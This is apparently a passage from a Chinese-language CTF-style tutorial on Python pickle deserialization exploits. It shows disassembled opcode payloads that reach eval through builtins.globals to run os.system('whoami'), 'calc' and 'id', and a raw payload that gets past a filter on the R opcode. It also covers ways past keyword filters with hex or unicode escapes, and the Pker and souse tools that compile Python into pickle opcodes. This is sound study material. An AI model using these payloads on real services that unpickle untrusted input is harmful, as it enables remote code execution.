44: t TUPLE (MARK at 21)
45: R REDUCE
46: p PUT 1
49: c GLOBAL 'builtins globals'
67: ) EMPTY_TUPLE
68: R REDUCE
69: p PUT 2
72: 0 POP
73: 0 POP
74: g GET 1
77: ( MARK
78: g GET 2
81: S STRING '__builtins__'
97: t TUPLE (MARK at 77)
98: R REDUCE
99: p PUT 3
102: 0 POP
103: g GET 0
106: ( MARK
107: g GET 3
110: S STRING 'eval'
118: t TUPLE (MARK at 106)
119: R REDUCE
120: ( MARK
121: S STRING '__import__("os").system("whoami")'
158: t TUPLE (MARK at 120)
159: R REDUCE
160: . STOP
当R
被过滤的时候我们就可以用o
字节码
opcode=b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("calc")o00.'
'''
0: \x80 PROTO 3
2: ( MARK
3: c GLOBAL 'builtins getattr'
21: p PUT 0
24: c GLOBAL 'builtins dict'
39: p PUT 1
42: X BINUNICODE 'get'
50: o OBJ (MARK at 2)
51: p PUT 2
54: 0 POP
55: ( MARK
56: g GET 2
59: ( MARK
60: c GLOBAL 'builtins globals'
78: o OBJ (MARK at 59)
79: X BINUNICODE '__builtins__'
96: o OBJ (MARK at 55)
97: p PUT 3
100: ( MARK
101: g GET 0
104: g GET 3
107: X BINUNICODE 'eval'
116: o OBJ (MARK at 100)
117: p PUT 4
120: ( MARK
121: g GET 4
124: X BINUNICODE '__import__("os").system("calc")o0'
162: 0 POP
163: . STOP
highest protocol among opcodes = 2
'''
绕过R
字节码的过滤
也就是我们上面说的b +__setstate__()
这里不过多赘述了
利用编码绕过
S
操作码本来就是识别string,所以也支持识别十六进制
S'flag' = S'\x66\x6c\x61\x67'
V
实例化一个UNICODE字符串对象,这说说明它也可以识别unicode编码
S'flag' = V'\u0066\u006C\u0061\u0067'
利用内置函数获得关键字绕过
我们可以利用dir()函数返回当前范围内的变量、方法和定义的类型列表
import sys
import secret
print(dir(sys.modules['secret']))
#
我们看到列表中的最后一项就是我们想要的关键字
用reversed()和next()前者将列表逆序,并返回一个迭代对象后者是获取迭代对象的下一个元素,默认从第一个元素开始。
来看效果
Pker
这是一个 可以遍历Python AST的形式 来自动化解析 pickle opcode的工具
Pker工具的用途
- 变量赋值:存到memo中,保存memo下标和变量名即可
- 函数调用
- 类型字面量构造
- list和dict成员修改
- 对象成员变量修改
使用方法
三个主要函数GLOBAL()
、INST()
和OBJ()
GLOBAL('os', 'system') => cos\nsystem\n
INST('os', 'system', 'ls') => (S'ls'\nios\nsystem\n
OBJ(GLOBAL('os', 'system'), 'ls') => (cos\nsystem\nS'ls'\no
return可以返回一个对象
return => .
return var => g_\n.
return 1 => I1\n.
当然你也可以和Python的正常语法结合起来,下面是使用示例
#pker_test.py
i = 0
s = 'id'
lst = [i]
tpl = (0,)
dct = {tpl: 0}
system = GLOBAL('os', 'system')
system(s)
return
#命令行下
$ python3 pker.py < pker_tests.py
b"I0\np0\n0S'id'\np1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n
souse
一种将Python源代码转换为操作码的工具(pickle),由Tr0y佬编写
这两个工具的用法一样,其一即可。
参考
pickle --- Python 对象序列化 — Python 3.11.2 文档